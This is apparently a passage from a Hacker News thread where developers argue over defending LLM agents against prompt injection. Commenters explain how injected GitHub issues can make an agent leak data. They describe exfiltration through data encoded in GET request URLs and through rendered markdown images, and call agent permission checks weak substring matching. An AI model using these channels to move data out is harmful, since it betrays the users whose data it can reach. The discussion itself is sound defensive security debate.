> as powerless as LLM companies want you to believe.

This is coming from first principles, it has nothing to do with any company. This is how LLMs currently work.

Again, you're trying to think about blacklisting/whitelisting, but that also doesn't work, not just in practice, but in a pure theoretical sense. You can have whatever "perfect" ACL-based solution, but if you want useful work with "outside" data, then this exploit is still possible.

This has been shown to work on github. If your LLM touches github issues, it can leak (exfil via github since it has access) any data that it has access to.

▲

schmichael 8 hours ago | parent [-]

Fair, I forget how broadly users are willing to give agents permissions. It seems like common sense to me that users disallow writes outside of sandboxes by agents but obviously I am not the norm.

▲

motoxpro 6 hours ago | parent | next [-]

The only way to be 100% sure it is to not have it interact outside at all. No web searches, no reading documents, no DB reading, no MCP, no external services, etc. Just pure execution of a self hosted model in a sandbox.

Otherwise you are open to the same injection attacks.

▲

schmichael 2 hours ago | parent [-]

I don't think this is accurate.

Readonly access (web searches, db, etc) all seem fine as long as the agent cannot exfiltrate the data as demonstrated in this attack. As I started with: more sophisticated outbound filtering would protect against that.

MCP/tools could be used to the extent you are comfortable with all of the behaviors possible being triggered. For myself, in sandboxes or with readonly access, that means tools can be allowed to run wild. Cleaning up even in the most disastrous of circumstances is not a problem, other than a waste of compute.

	▲	lunar_mycroft 41 minutes ago \| parent [-]
		There is no such thing as read only network access. For example, you might think that limiting the LLM to making HTTP GET requests would prevent it from exfiltrating data, but there's nothing at all to stop the attacker's server from receiving such data encoded in the URL. Even worse, attackers can exploit this vector to exfiltrate data even without explicit network permissions if the users client allow things like rendering markdown images.

▲

rcxdude 7 hours ago | parent | prev | next [-]

Part of the issue is reads can exfiltrate data as well (just stuff it into a request url). You need to also restrict what online information the agent can read, which makes it a lot less useful.

▲

Uehreka 5 hours ago | parent | prev | next [-]

“Disallow writes” isn’t a thing unless you whitelist (not blacklist) what your agent can read (GET requests can be used to write by encoding arbitrary data in URL paths and querystrings).

The problem is, once you “injection-proof” your agent, you’ve also made it “useful proof”.

▲

schmichael 2 hours ago | parent [-]

> The problem is, once you “injection-proof” your agent, you’ve also made it “useful proof”.

I find people suggesting this over and over in the thread, and I remain unconvinced. I use LLMs and agents, albeit not as widely as many, and carefully manage their privileges. The most adversarial attack would only waste my time and tokens, not anything I couldn't undo.

I didn't realize I was in such a minority position on this honestly! I'm a bit aghast at the security properties people are readily accepting!

You can generate code, commit to git, run tools and tests, search the web, read from databases, write to dev databases and services, etc etc etc all with the greatest threat being DOS... and even that is limited by the resources you make available to the agent to perform it!

	▲	madhadron an hour ago \| parent [-]
		I'm puzzled by your statement. The activities you're describing have lots of exfiltration routes.

▲

formerly_proven 6 hours ago | parent | prev [-]

Look at the popularity of agentic IDE plugins. Every user of an IDE plugin is doing it wrong. (The permission "systems" built into the agent tools themselves are literal sieves of poorly implemented substring-matching shell commands and no wholistic access mediation)